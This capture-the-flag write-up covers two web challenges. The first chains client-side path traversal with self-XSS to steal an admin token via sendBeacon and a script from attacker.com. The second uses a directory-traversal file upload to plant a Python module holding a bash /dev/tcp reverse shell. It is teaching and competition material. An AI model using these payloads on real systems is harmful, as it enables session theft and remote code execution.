Kaspersky{CTF} - Bubble: rerevenge, Peach Investor writeup

Bubble: ReRevenge

Vulnerability

1. Client Side Path Traversal
   
   e and t are controlled by Path parameters.

As shown in the picture above, we can manipulate the api requested path using path traversal.

3. Self XSS
   
   When writing a post, self-xss occurs in the preview function.

Chainning

Admin bot works as follows.

1. Register
2. add post with flag
3. visit post
4. write comment with post's author name
5. back to dashboard, and write new post

In 4th steps, Client Side Path traversal vulnability also occurs.

So we can save draft with our username.

At this time, if our username contains XSS payloads, we can get xss when admin bot perform course 5.

Payload

1. Change username to below payloadsaf.js -> navigator.sendBeacon("https://webhook",localStorage.getItem("DiarrheaTokenBearerInLocalStorageForSecureRequestsContactAdminHeKnowsHotToUseWeHaveManyTokensHereSoThisOneShouldBeUnique"))
2. @[youtube srcdoc=<script/src=//attacker.com/af.js></script>]
3. report url
4. https://bubble-tea-rerevenge.task.sasc.tf/post/USER_UUID/posts/506%2f.%09.%2f.%09.%2f.%09.%2f.%09.%2f.%09.%2f.%09.%2f.%09.%2fapi%2fdrafts%2fsave%23
5. get flag using admin session token

FLAG : kaspersky{6ruh_6um6l3_1s_n0_m0r3}

Peach Investor

Vulnerability

1. File upload vuln
   

We can upload any file without restriction.
And, no validation exists for source parameter, we can upload files to any location by directory traversal.

Exploit

In docker container, I saw that the celery scheduler import a strange module (billiard).
We can use this to get shell.

If we create a directory called billiard, and upload __init__py with a reverse shell in it, our code will run when the scheduler executed.

Payload

POST /upload?source=../billiard HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: en,ko;q=0.9,zh-CN;q=0.8,zh;q=0.7
Cache-Control: no-cache
Connection: keep-alive
Content-Length: 269
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBB3U3Fw3boGnqJKQ
Host: 409fe342-33f9-4f27-b317-398f174974ee.kit.sasc.tf
Origin: http://localhost:8000
Pragma: no-cache
Referer: http://localhost:8000/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
sec-ch-ua: "Not;A=Brand";v="99", "Google Chrome";v="139", "Chromium";v="139"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"

------WebKitFormBoundaryBB3U3Fw3boGnqJKQ
Content-Disposition: form-data; name="file"; filename="__init__.py"
Content-Type: application/json

import os
os.system("/bin/bash -c 'bash -i > /dev/tcp/IP/1234 0>&1'")
------WebKitFormBoundaryBB3U3Fw3boGnqJKQ--

FLAG: kaspersky{p41d_w17h_c4sh_4nd_3nd3d_up_s0_s35h}